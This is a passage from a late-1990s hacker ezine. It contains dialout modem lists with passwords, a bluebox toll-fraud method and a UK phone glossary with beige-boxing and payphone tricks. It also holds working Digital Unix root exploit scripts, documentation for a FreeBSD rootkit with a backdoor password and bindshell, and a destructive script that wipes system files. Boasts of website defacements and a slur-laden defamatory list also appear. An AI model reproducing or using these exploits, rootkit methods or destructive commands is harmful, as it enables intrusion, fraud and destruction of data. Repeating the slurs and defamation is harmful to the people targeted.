1200 0302078100901 416 Toronto (ONT) 300 0302091600901 1200 0302091600902 604 Vancouver (BC) 300 0302067100900 1200 0302067100901 519 Windsor (ONT) 300 0302029500900 1200 0302029500901 204 Winnipeg (MAN) 300 0302069200902 1200 0302069200901 ??? 0228479110650 DIALOUT PSW?? CALL 50 LOGIN=LOGIN 70,1/NAME:XX ──────────────────────────────── Misc ─────────────────────────────── !?! EURO eurogate.iit.nl register call European carriers (access via telnet is restricted?) !?! 513 dialout.afit.af.mil dialout PWD? port 2 !?! 414 modems.uwp.edu Ctrl-{ # Connection Refused !?! 404 emory.edu .modem8 or .dialout !?! DC dialout24.cac.washington.edu CONNECTION REFUSED ?!? 604 dial24-nc00.net.ubc.ca | dial24-nc01.net.ubc.ca ?!? 604 dial96-np65.net.ubc.ca !?! isn.upenn.edu "modem" attached to 17 port LOCAL DIALOUT.IUPUI.EDU l/p:DIALOUT/ DOWN 213 bbs.thecosmos.com 214 register first / dial dallas and LA DOWN 215 isn.upenn.edu DIAL: MODEM DOWN 416 pacx.utcs.utoronto.ca outdial unavail www.utoronto.ca/welcome.html/index.html DOWN? 619 dialin.ucsd.edu "dialout" Sandego CA DOWN 916 cc-dnet.ucdavis.edu connect hayes/dialout ────────────────────── Login/Pass or Port Pass ────────────────────── PSW 204 dial.cc.umanitoba.ca PSW 206 rexair.cac.washington.edu PSW 303 yuma.ACNS.ColoState.EDU login: modem PSW 412 dialout.pitt.edu / gate.cis.pitt.edu only for students "Connect Dialout" "d91kxxxxxx" x=fone # or tn3270, connect dialout.pitt.edu, atdtxxxXXXX PSW 514 cartier.CC.UMontreal.CA externe,9+number PSW 602 dial9600.telcom.arizona.edu PSW 619 dialin.ucsd.edu "dialout" PSW ??? modems.csuohio.edu PSW ??? dialout.bu.edu PSW ??? portal.ucs.indiana.edu ONLY for Students http://msgwww.ucs.indiana.edu/messaging/ /projects/portal/dialout.html PSW 128.187.1.2 PSW TW sparc20.ncu.edu.tw u349633 PSW TW sun2cc.nccu.edu.tw ? PSW twncu865.ncu.edu.tw guest ──────────────────────────── Trying... ────────────────────────────── ??? 206 rexair.cac.washington.edu ??? 206 dialout24.cac.washington.edu ??? 218 modem.d.umn.edu Hayes 9,XXX-XXXX ??? 307 modem.uwyo.edu ??? 313 35.1.1.6 "dial2400-aa" or "dial1200-aa" ??? 415 128.32.132.250 CA "dial1" or "dial2" ??? 502 outdial.louisville.edu ??? 502 uknet.uky.edu connect kecnet @ dial: "outdial2400 or out" ??? 602 acssdial.inre.asu.edu/[129.219.17.3]. atdt8,,,,,[x][yyy]xxxyyyy. ??? 609 129.72.1.59 Princeton NJ | "Hayes" 128.119.131.11X ??? 615 dca.utk.edu "dial2400" Tennessee ??? 713 128.249.27.153 | "Hayes" ??? 713 128.249.27.154 , Login:c modem96 ??? 714 130.191.4.70 atdt 8xxx-xxxx ??? 714 modem.nts.uci.edu atdt[area]0[phone] ??? 128.6.1.42 ??? modempool.pbs.org "connect" ??? datapbx.cc.ncsu.edu dest:dial ATDT 9,xxxxxxxx www2.ncsu.edu ──────────────────────────── No route ─────────────────────────────── ROUTE OH* r596adi1.uc.edu | 129.137.33.72 ROUTE 404 128.140.1.239 .modem8|CR .modem96|CR ROUTE 212 DIALOUT.NYU.EDU dial3/dial12/dial24 ROUTE 514 132.204.211 ROUTE 619 128.54.30.1 nue, ? atdt [area][phone] ROUTE 129.180.1.57 ROUTE ??? modem.nyu.edu ROUTE ??? TN3270 telnet.ksu.edu At the Select Destination prompt, enter DIALOUT Perhaps a better method is to use MS-Kermit 3.10 MSKERMIT SET HOST TELNET.KSU.KSU.EDU DIALOUT ATDT9[1aaappp]xxxxxxx[,,auth] to USE AT&T calling Card ATDT90NPAxxxxxxx,,,,CardNumberPIN 7 ───────────────────────────── Dead ────────────────────────────────── /// 215 wiseowl.ocis.temple.edu | atz atdt 9xxxyyy /// 218 aa28.d.umn.edu "cli" "rlogin modem" /// 404 broadband.cc.emory.edu Atlanta Georgia /// 404 dialout1.princeton.edu /// 416 annex132.berkeley.edu. 9xxxyyyy?atdt9,,,,,xxxyyyy? /// 614 ns2400.ircc.ohio-state.edu (DIAL) /// 617 dialout.lcs.mit.edu () /// 902 star.ccs.tuns.ca | "dialout" P E I /// modem.atk.com /// modem.cis.uflu.edu /// vtnet1.cns.ut.edu "CALL" or "call" ──────────────────────── Note descriptions ──────────────────────── ??? trying IP address... /// Unknown Host ROUTE No route to Host LOCAL Local Access only ? PSW Login/Password Required !?! Strange !!! Working (should be, heh) ─────────────────────── Used Dox/Search Engines ────────────────────── www.altavista.com | www.infoseek.com [Ultra] Dialout List#4 - 22/12/93 By SPiN-DoC 2600's Vol. 8 #1 Dialout List +- some junk alt2660.faq [Hardcore Phreaks (8)] ────────────────────────────────────────────────────────────────────── [eoF^z] ─────────────────────────────────────────────────────────────────────────────── 2. BlueBoxing in the UK in '98 : The UK Phreaking Elite ─────────────────────────────────────────────────────────────────────────────── .------------------------------------------------------------------. | \ ____ \__ __ ____ / | | ___/ / / / \_ / \ / / / \___ ! | / \ ____/ \/___________|___________/ \/________/ \__ : ! __/\/ / / : : __/ /_________________________________________/ /\__ ! : \_________________________________________\/ / \___ | : __/ \___ ____/ | : \__/ \__/ _/ \__/ / \__ | : / | / . ! . | ! ! . : ! : : . : | | . | ! : : ! : ! : !__| ! |__! : ! : / / D e s T r u C T i v E / / : : : : !___/ /_______________________/ /____!__ : ! !/ / / / / / ____/ / ___ / ! `-------- / / / / / / / / / / __/ -----------' \______/\______/\__/___/\______/\__/\______/ "The Hardcore Will Never Die" Since March 1994 there have been many rumours about the "death" of Blueboxing. The truth is that Blueboxing is very much alive, it has just become a little more difficult, and harder to understand. In some cases it's not just a case of knowing the tones, it also takes a lot of skill and patience. The "elites" who have been boxing since then (excluding lamers spoon-fed info from earlier Destructive Jungle releases), have had to work hard to find out how to carry on boxing, and have kept it to themselves. In reaction to recent busts, we are now going to once again, teach the newbies, lamers, and in fact, everyone we possibly can, how to Bluebox. BT may think they have a problem already, but the trouble is only just beginning. Spread this information as far and wide as you can. This "current" method (as of 24/02/98) is actually very simple: The magic number is: 0800 890 861 (China Direct Calling Card Service) Freq 1 Freq 2 Length --------------------- Tone 1 2400Hz/2600Hz 135ms Tone 2 2400Hz/2400Hz 240ms Best to send the break after pick-up. It's all automated, so it won't annoy any operators. As well as calling China, you can also call the UK (trade warez for hours!) and New Zealand. A few other countries are possibly available, but they keep changing them. For those of you with bad memories: KP2-44-0-171-930-4832-ST is the format for international dialling. --- Special note to BT: This file is written by nobody in particular. The person(s) posting it to newsgroups/BBS's/wherever have no connection with us. You can try to find the people responsible, but will soon come to realise that it's an impossible mission. Myself and my friends certainly will not be blueboxing, and have not done for quite some time. This particular route probably won't last very long, but there are plenty more to come. We will always have the upper hand. Hugs & Kisses. The UK Phreaking Elite. ─────────────────────────────────────────────────────────────────────────────── 3. UK Phone Definitions and Abbreviations : Jf ─────────────────────────────────────────────────────────────────────────────── I have put together as much stuff as I think is necessary for an average knowledge of the UK fone system, switching methods and exchange types. I would defiently recommend researching into the subjects contained in this document in more detail to gain a very detailed knowledge, if you are stuck then email me and I will help to guide you along. The Information below is enough to get you started and provide you with an average knowledge of the UK fone system.... so enjoy.. Jf_ aka Josh Freedaleman JF@cofuk.org http://www.cofuk.org ====================================== AAS - Automatic Announcement Subsystem ====================================== Used in Local Exchanges as a method of voice operated guidance. eg. informs of code changes by automated messages. For example, these appeared a lot in 1994 when all area codes changed. On 16th April 1994 all area codes had a 1 added to them. For example 081 became 0181 and therefore AAS was used alot during this time to leave automated messages, these go something like this... "This is a BT announcement, the number you have dialed has changed, pleased add a 1 after the 0 on the area code and replace the handset and try again". ========= Cab Boxes ========= Large green boxes located on the sides of roads to deal with all the lines in that area, some cab boxes are full of 100s of wires for that area whereas others can be much smaller. I would recommend having a look inside one of these as they are totally full of wires but don't get caught opening one of these as you might be arrested! :o) If you open one of these cab boxes you can beige box off it, good fun if the cab box has 100s of lines in it as you can easily seize lot of peoples fone lines :o) If you have a laptop computer you could find a cab box in a secluded area, box of it, hide in bushes or something and hax0r from that seized line, I would recommend this if you are going to carry out a big hack. -- Cab boxes are also called PCP's (so1o) ======================================================================== CCITT - Consultive Committee for International Telegraphs and Telephones ======================================================================== An international committee setup to regulate and discuss international fone communication matters and standards of communication devices. The UK fone system is based on CCITT7 which is used in most developed (?) countries such a America and the UK. To blue box from the UK you need to be looking for countries which used CCITT5 lines, the best way I know of to find CCITT5 lines is to dial the countries 0800 89 **** number and if you here a click beep sound then you have identified a CCITT5 line which is vulnerable to boxing. =============================== CCS - Common Channel Signalling =============================== Process used by BT to reserve a speech channel for signalling and to control all the other channels in its section. This is the standard method of signalling between digital exchanges. =============================================== COCOT - Customer Owned Coin Operated Telephones =============================================== A Payphone owned privately by businesses, they usually add a little bit extra onto the price of calls to make some more money, found in hotels, swimming pools etc. There are lots of COCOT tricks that you can get up to, I have not tried all of them but two that I have tried and have worked succesfully for me are the following - dial *#2580 on the fonepad, it makes the line an engineers test line and you can then dial any number you wish for free, and I mean any number :o) Another trick is that some COCOT's have the line going into a wallplug located near the telephone, just unhook the fone line and plug your own fone in place, I did this at my local Swimming Pool recently and dialed a friend in the States for FREE!#@! =============================== CPS - Call Processing Subsystem =============================== Used on local exchanges to take overall control over a line, it registers the state of the line and tells callers whether it is free, engaged etc. This is the fundamental part of the local exchange and without this, well, there would be no calls really as nothing would be able to register. =================================== DCCE - Digital Cell Centre Exchange =================================== Another exchange which handles services on a local scale, distributing calls to other exchanges, this is a lesser form of DMSU but perfoms a similar job. ========================================= DDSN - Digitally Derived Services Network ========================================= A network of numbers used as service numbers eg 0800, 0891, 0898, 0500. ============================= DLE - Digital Local Exchanges ============================= Hosts the RCU's used within a local exchange, If you get a chance to look at you local DLE do it, I found it very impressive and was really stood there in awe of it all. =================================== DLSU - Digital Local Switching Unit =================================== Handles all the local customers fone needs and services, putting them onto the right connections and switching them about so that they reach their required destination. Really like an operator but as this is the 1990s its all in digital form :o) ================================== DMSU - Digital Main Switching Unit ================================== Controls and switches Telephone traffic within its designated area and it will distribute this traffic to its local exchanges. ============================ DSU - Digital Switching Unit ============================ Original Manufactured to handle the very high call volume in and around London, based on the DMSU but designed to take a higher amount of calls and distribute them onto the local exchanges. DSU's are now found in and around lots of major large cities where they are needed to take control of the high call volume while the DMSU's take care of the rest of the country. ================================ DTMF - Dual Tone Multi-Frequency ================================ The tones heard on your home fone when you dial in your numbers on the keypad. ============================== ERS - Emergency Repair Service ============================== The Engineers on Standby to repair fones etc. ============= Meridian Mail ============= A Voice Mail System provider, owned by Northern Telecom and a major UK supplier of VMB's for UK businesses. -- there are a few neat meridian mail tricks (so1o) ============================= PBX - Private Branch Exchange ============================= Exchange used by large companies to deal with their calls, great fun to *hack*, I have found that these are usually located in the 0500 prefix range. These are usually provided by Norstar and are very common with big companies who have stores in all areas of the country, or on a local scale. =========================== PCM - Pulse Code Modulation =========================== Modern BT signalling method used which cuts down information from several calls into smaller packets, sending them in turn down the line. ======================================== PSTN - Public Switched Telephone Network ======================================== This is a large BT exchange network which contains all the smaller local exchanges and looks after all these. eg. DLE's, RCU's etc ============================== RCU - Remote Concentrator Unit ============================== Basically Cab Boxes (PCPs) that provide a meeting point for ALL the lines in an area, they are bigger than Cab Boxes and tend to occupy full buildings rather than little boxes on the side of the road, RCU's are therefore found at your local telco depot and they are very impressive to look at. ======== System X ======== System X is a digital phone exchange which was the first installed in UK and was set to be installed 100% throughout UK until someone thought that it was unfair for one company to dominate the digital exchange market so a company called Ericsson produced AXE, a rival digital fone exchange system, the AXE10 system was chosen by BT and this forms what we call the BT System Y Exchange. System X technology was soon outdated after release due to the fact that it was designed by a committee who were slow at releasing its first model and by this time AXE had been released and it saw a vast technological improvement on System X while keeping the fundamental backbone on which it was based. ======== System Y ======== The UK digital Exchange based heavily on the AXE10 Digital Exchnage System Manufactured by Swesih company Ericsson, System Y is the UK alternative to System X and is installed fully in over 90% of the UK. When it was released it was much more technologically advanced than System X but heavily structured on it. ==================== VMB - Voice Mail Box ==================== Used by companies to keep in touch with each other by an answering machine type of service, usually found as freefone numbers and a main supplier of these is Meridian Mail. There are lots of VMBs which can be found if you scan for them and they provide interesting toys if you want to *hack* them. Thats your lot for now...I believe that the information in this document is all you need for an average knowledge of the UK fone system. I have cut out all the bullshit and all the outdated info that you will find in numerous other texts and left you with what you need. If you have found an area in this document that really interests you then do more research into that area and specialise, you should be able to find further information on most things included in this document, so go hunting or look out for more texts from me soon.... If you would like to talk about anything connected with this text or any other relevant h/p stuff then you can find me in #phreak and #CoF on undernet when I am on irc. My nick is Jf_ of course :o) Jf_ aka Josh Freedaleman JF@cofuk.org CoF - http://www.cofuk.org ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Top Ten Reasons why..You shouldn't leave small children alone with Emmanuel Goldstein. ─────────────────────────────────────────────────────────────────────────────── 10) He isn't down with the posse, although he think's he is 9) He seems a little too friendly 8) He likes little boys 7) His nick is jewish 6) so1o said so 5) He appeared on "The Learning Channel" inbetween when speedy and gonzolez showed you how to get free AOL and how to generate credit card numbers 4) He published an arcticle on how to steal (*gasp*) 3) He was an english major 2) Do you know how hard it is to get rid of head lice? 1) HE'S A FUCKIN CHILD MOLESTER YOU DUMB CUNT!@^&%$@% ─────────────────────────────────────────────────────────────────────────────── 2. Hacking Digital Unix 4.0 : humble ─────────────────────────────────────────────────────────────────────────────── Local techniques ---------------- The first thing to try is the IFS hole in /usr/sbin/dop. If dop is setuid root, there is a good chance that you can gain root this way. Here is a shell script : ---------------------------------------------------------------------------- #!/bin/sh cat > /tmp/usr <<EOF #!/bin/sh IFS=" " export IFS exec /bin/sh EOF chmod 755 /tmp/usr IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root ---------------------------------------------------------------------------- After running this shell script, if it works, your euid should be 0. Your prompt may or may not change depending on which shell you are using, so do an id and check. That is a old sploit that most competent admins have probably fixed. Digital Unix has a large problem in the way that it handles core dumps of setuid root programs. If you can get a setuid root program to dump core, it will create the core file as root, and it will follow symlinks. So, how can we exploit this? I noticed a long time ago that if you run dbx on a setuid root program that you have read access to, then it will core dump in your current directory. Dbx is a debugger that comes with digital unix. However, some times machines won't have the liscence files installed correctly. Here is the exploit : ---------------------------------------------------------------------------- #!/bin/sh # dbx exploit by humble # works on Digital Unix 4.x # this overwrites /.rhosts mkdir /tmp/.testing cd /tmp/.testing ln -s /.rhosts core BOB=" + + " export BOB dbx /bin/crontab dbx /bin/crontab dbx /bin/crontab rm -rf /tmp/.testing rsh -l root localhost /bin/sh -i ---------------------------------------------------------------------------- If /bin/crontab is not setuid root or you don't have read permissions to it, you can use any other setuid root program. Ok. If that doesn't work, there is another core dump situation I have found. I have only verified this on three machines and have been told that it hasn't worked on one or two others. The program /usr/X11/bin/dxpause is a screen locker. I found that when I run that program, and have my DISPLAY set to my freebsd or my linux box (running xfree86), the program will dump core as root. Be carefull though, if the program doesn't dump core, you will have to enter the password of the person who's account you are using. You have to set up your X server to allow connections from the target, and you will probably have to click once on your machine to get the program running on the Digital Unix box to crash. Anyway, this can be exploited in a similair fashion to the dbx problem. There is another core dump that was mentioned on Bugtraq by Tom Leffingwell, but I haven't been able to re-create it. Here is excerpts from his posting: ---------------------------------------------------------------------------- Version Affected: Digital UNIX 4.0B *with* patch kit 5 Unpatched 4.0B is not vunerable to this particular problem, but it is to others. Patch kit 5 included a replacement xterm because the old one had a bug, too. They replaced it with another that had a bigger problem. You can cause a segmentation fault in xterm simply by setting your DISPLAY variable to a display that you aren't allowed to connect to or one that doesn't exist. Start xterm, and you get a core file. ---------------------------------------------------------------------------- Ok, core dumps not working? Don't worry.. there's more. There has been some talk about holes in dtappgather on the security mailing lists. We can use one of the holes to our advantage as well. Using dtappgather, we can make any file on the system owned by us. This is obviously a good way to take over a machine. Exploit: env DTUSERSESSION=../../../../../../../../etc/passwd /usr/dt/bin/dtappgather and /etc/passwd is now owned by us. This could be used to gain control of /etc/inetd.conf and just about anything else you could imagine. I haven't used this exploit to mess around with the /tcb/files/auth/* tree, but I would be willing to bet it is very successfull. I've also noticed that the X server setup on some Digital Unix boxes are insecure. If you have a shell on the machine, try to set your DISPLAY to localhost:0 or the machines hostname:0, and then run a program like xkey. Here are some exploits that I havent used or tried before (edited a little): ---------------------------------------------------------------------------- .LoW _ _ |\ | _ |(_`|_' | \|(_)|,_)|_. ========================== H0l4. So here it is another bug for Digital System: OSF1 my.narco-goverment.sucks.co V4.0 464 alpha Program: fstab - Static information about file systems and swap partitions advfsd - Starts the AdvFS graphical user interface daemon Problemo: It creates a lockfile in tmp with nice permitions :) /tmp>ls -la (Blah Blah Blah.....) -rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile What the hell to do with it: Before it creates ln -s /.rhosts /tmp/fstab.advfsd.lockfile from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc. The End - El Fin Colombia 1997. .LoW _ _ |\ | _ |(_`|_' | \|(_)|,_)|_. Efrain 'ET' Torres ---------------------------------------------------------------------------- This if for Digital Unix 3.x (I've never seen it work.) $ ls -l /usr/tcb/bin/dxchpwd -rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd $ ls -l /tmp/dxchpwd.log /tmp/dxchpwd.log not found $ export DISPLAY=:0 (or a remotehost) $ ln -s /hackfile /tmp/dxchpwd $ ls -l /hackfile /hackfile not found $ /usr/tcb/bin/dxchpwd (The dxchpwd window will appear. Just enter root for username and anything for the passwd. You'll get a permission denied message and the window will close.) $ ls -l /hackfile -rw------- 1 root system 0 Nov 16 22:44 /hackfile ---------------------------------------------------------------------------- Remote techniques ----------------- I don't have too much here except one pretty big hole. Digital Unix 4.x is blind ip spoofable!!! So, if you can guess or determine a trust relationship, the machine is yours. Also, when the CERT statd advisory came out, Digital released a patch. I haven't played around with that, but it might be worth looking into. Also, Digital Unix 4.0 sometimes has an 0wned finger daemon, try this.. % finger ▌/bin/w@host if this gives uptime info etc, it shows the system is vulnerable to this attack, you can specify any command.. simple to use. ─────────────────────────────────────────────────────────────────────────────── 3. FreeBSD 2.2.5 rootkit : humble / method ─────────────────────────────────────────────────────────────────────────────── Ok.. I found this rootkit out on an ftp site somewhere. Anyway, when I got it, there was a bunch of compile errors and it seemed to be for an older version of freebsd. So, I took a new source tree from my box and copied the trojan code from this rootkit into it.. So, this rootkit will work on the FreeBSD 2.2.5-RELEASE. The rootkit is around 350k in size (compressed) and it is available from the following : ftp.sekurity.org/users/so1o www.technotronic.com/files/ezines/crh www.fth.org/crh Ok.. I left out the following trojans and files: chpass Trojaned! User->r00t passwd Trojaned! User->r00t zapbsd2 An improved utmp/wtmp/lastlog type zapper tripwire Trojaned! Hide changes but I put in: marryv11.c good log cleaner.. i put a #define bsd in it Enjoy, humble - jmcdonal@unf.edu 1/15/98 Thanks to ducksquak, simpson and sygma for testing. The _____ ____ ____ ____ | ___| __ ___ ___| __ ) ___|| _ \ | |_ | '__/ _ \/ _ \ _ \___ \| | | | | _|| | | __/ __/ |_) |__) | |_| | |_| |_| \___|\___|____/____/|____/ rootkit 1.2 (1/27/97) by Method NOTE: This package was heavily influenced by the existing Linux rootkit, which in turn was adapted from the SunOS rootkit, etc., etc. UPDATES: 1.0.1 - Fixed some broken Makefile stuff. Made it so inetd does the right thing on a SIGHUP. Added some extra security to the shell trojans. 1.1 - Added tripwire trojan. Cleaned up some other stuff. 1.2 - Put a password on inetd (Thanks for the suggestion Whoot :) This package includes the following: chpass Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs fix File fixer! addlen File length fixer(!) zapbsd2 An improved utmp/wtmp/lastlog type zapper bindshell port/shell type daemon! tripwire Trojaned! Hide changes sniffit A kewl sniffz0r! INSTALLATION: To install this kit execute the command 'make all install' from the # prompt. All of the file/password configurations are in config.h so feel free to modify things to suit your particular fancy. Everything here has been tested on a FreeBSD-stable distribution. See the note at the end about what to do if the admin uses tripwire. Also make sure to read the Makefile and scripts so you know what's going on. USAGE: OK I will go through how to use each program one by one. NOTE when I say password I mean the rootkit password not your users password (d0h!). By default the rootkit password is "h0tb0x". chpass - Local user->root. Run ch{sh,fn,pass} then when it asks you for a new name enter your password. inetd - Binds a shell to a port for remote access. Adds a shell exec service on the ingreslock port, type in the rootkit password to start a shell. login - Allows login to any account with the rootkit password. If root login is refused on your terminal login as "r00t". History logging is disabled if you login using your password. ls - Trojaned to hide specified files and directories. The default data file is /dev/ptyr. All files can be listed with 'ls -/'. The format of /dev/ptyr is: ptyr fbsdrootkit-1.0 pr0n Use partial filenames. This would hide any files/directories with the names ptyr, fbsdrootkit-1.0 and pr0n. du - (see ls) ifconfig - Modified to remove PROMISC flag on the ethernet device. netstat - Modified to remove tcp/udp/sockets from or to specified addresses, paths and ports. default data file: /dev/ptyq command 1: hide local address command 2: hide remote address command 3: hide local port command 4: hide remote port command 5: hide UNIX socket path example: 1 128.31 <- Hides all local connections from 128.31.X.X 2 128.31.39.20 <- Hides all remote connections to 128.31.39.20 3 8000 <- Hides all local connections from port 8000 4 6667 <- Hides all remote connections to port 6667 5 .term/socket <- Hides all UNIX sockets including the path .term/socket passwd - Local user->root. Enter your rootkit password instead of your old password. ps - Modified to remove specified processes. Default data file is /dev/ptyp. An example data file is as follows: 0 0 Strips all processes running under root 1 p0 Strips tty p0 2 sniffer Strips all programs with the name sniffer Don't put in the comments, obviously. rshd - Execute remote commands as root. Usage: rsh -l rootkitpassword host command i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i would start a root shell. syslogd - Modified to remove specified strings from logging. I thought of this one when I was on a system which logged every connection.. I kept getting pissed off with editing files every time I connected to remove my hostname. Then I thought 'Hey dude, why not trojan syslogd?!' and the rest is history. :) Default data file is /dev/ptys Example data file: evil.com 123.100.101.202 rshd This would remove all logs containing the strings evil.com, 123.100.101.202 and rshd. Smart! :)) sniffit - An advanced network sniffer. This is pretty kewl and has lots of filtering options and other stuff. Useful for targetting a single host or net. Sniffit uses ncurses. bindshell - This is pretty self-explanatory. Basically it binds a shell to a port, 31337 by default. Read the source on this one. fix - Replaces and fixes timestamp/checksum infomation on files. I modified this a bit for my own uses and to fix a nasty bug when replacing syslogd and inetd. The replacement file will be erased by fix (unlike other versions). addlen - This quickie modifies the length of files by adding harmless zeros to the end. Wonder why nobody ever thought of doing this before. Inspired by a stupid security tool which checks lengths of setuid files. zapbsd2 - This improved version of zapbsd writes over entries with ones instead of zeros. I added some capabilities and error checking so I raised the number. TRIPWIRE: I have done a major improvement of this part. Simply make tripwire and the script will ask you a few questions and take action depending on your responses. If both the database file and tripwire binary are read-only then there is nothing you can do. SOURCES: Some of these patches are derived from the original SunOS rootkit. ls, du, ps, netstat and chpass were done by yours truly. Anything else came from the Linux rootkit with a few modifications. The idea for tripwire was my own. OTHER: I welcome all comments and questions at method@yikes.com. All complaints and flames will be sent to /dev/null. Thanks to OGhost and Phelix for beta testing and advice. In closing, this kit can only take you so far. Although it covers almost everything, a competent sysadmin will eventually catch on. Remember, never let your guard down. -M ─────────────────────────────────────────────────────────────────────────────── 4. l0ckd0wn.sh : so1o ─────────────────────────────────────────────────────────────────────────────── This is what you run when you're root, and you want to l0ckd0wn the system, useful in the cases of webpage attacks over weekends etc. heh % cat > l0ckd0wn.sh << STOP <paste th3 skr1pt sh1t h3re> STOP % sh l0ckd0wn.sh l0ckd0wn in pr0gr3ss.. must run as r00t % (then everything will go b00m) Here it is... ------------- #!/bin/sh # # l0ckd0wn.sh - so1o th3 k1ng. # echo "l0ckd0wn in pr0gr3ss.. must run as r00t" echo "0wned:hahahahaha:666:666:l0ckd0wn m0therfuck3r:/dev/null:/dev/null" > /etc/passwd echo "0wned:666::::::::" > /etc/shadow echo "#" > /etc/inetd.conf echo "#" > /etc/syslog.conf echo "w0rdup, we b3 0wned" > /etc/issue.net rm -rf /var rm /etc/*tmp rm /bin/login touch /etc/utmp touch /etc/wtmp kill -9 -1 ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. VMG 0wned : sw1tch ─────────────────────────────────────────────────────────────────────────────── THE SAGA CONTINUES. =================== we have NFS skill, and they got br0ken.. again, but this time we had a plan : Mirror of Janet Jackson page (jacko smokes a blunt) : http://www.hacked.net/exp/com/janetjackson/ ------------------------------------------- Mirror of Rolling Stones page (mick fagg0r goes bald and ph34rz) : http://www.hacked.net/exp/com/the-rolling-stones/ ------------------------------------------------- Not forgetting the Spice Gurls (b0w) : http://www.hacked.net/exp/uk/co/vmg/spiceworld/ ----------------------------------------------- ugh, we didn't do it, it was other kids and stuff.. ─────────────────────────────────────────────────────────────────────────────── = HANSON ARE NEXT, THEY WILL D1E. SO WILL THE BACKSTREET BOYS, OH YES. = ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. The Rhino9 Sentinel : so1o / humble ─────────────────────────────────────────────────────────────────────────────── Sentinel is a remote auditing tool that myself and humble are developing for the Rhino9 Security Research Team, it will rock, and we will release the beta version as soon as we get it finished, it is _very_ fast and effective, we'll keep y'all posted! Full d0x will be in CRH issue 9. ─────────────────────────────────────────────────────────────────────────────── 2. TOTALCON '98 : so1o ─────────────────────────────────────────────────────────────────────────────── $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ +------------------------------------+------------------------------------+ ▌ An Official TotalCon Announcement ▌ An Official TotalCon Announcement ▌ ▌ An Official TotalCon Announcement ▌ An Official TotalCon Announcement ▌ +------------------------------------+------------------------------------+ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ TotalCon '98 is now a reality, here are preliminary details... ============================================================== Venue : The Old Firestation, Silver Street, Bristol, ENGLAND Date : *** POSTPONED, PROBLEMS WITH PREMESIES, stay tuned!@%$ *** Duration : 36 hours non-stop (midday -> 10:00pm next day) Cost : £15 (15 UKP) ON THE DOOR, this will go back into the event (beer etc.) What : 12 system network (with additional terminals) along with full internet access, bring your laptops! Loud music, live DJ's Fully licensed bar downstairs / next door Elite UV and spotlighting ALOT of cool people ^^^^^^^^^^^^^^^^^^^ *** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER *** Travel : Easily accessible by car, train, bus, plane or boat. Accomodation : You can hang around the Firestation or book one of many good hotels in the immediate area. Notes : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL GO BACK INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS OF BEER AND FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ +------------------------------------+------------------------------------+ ▌ An Official TotalCon Announcement ▌ An Official TotalCon Announcement ▌ ▌ An Official TotalCon Announcement ▌ An Official TotalCon Announcement ▌ +------------------------------------+------------------------------------+ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── .-----------. : : .-----. `-----. ; .-----. :. : .--' .' .' : : .: .-------:::. : : .' .' : . : .:::-------. `-------:::' :: : .' .' :: : : `:::-------' :' ::.`--. :::: `-----. ::. : `: `-----' ::::. : `-----' `-----------' [ Team CodeZero ] gl0b4l m0therfuck3rz, g1v1ng y0u th3 r34l d34l. ─────────────────────────────────────────────────────────────────────────────── the c0dez squirel returns next issue, he's back from vacation. ───────────────────────────────────────────────────────────────────────────────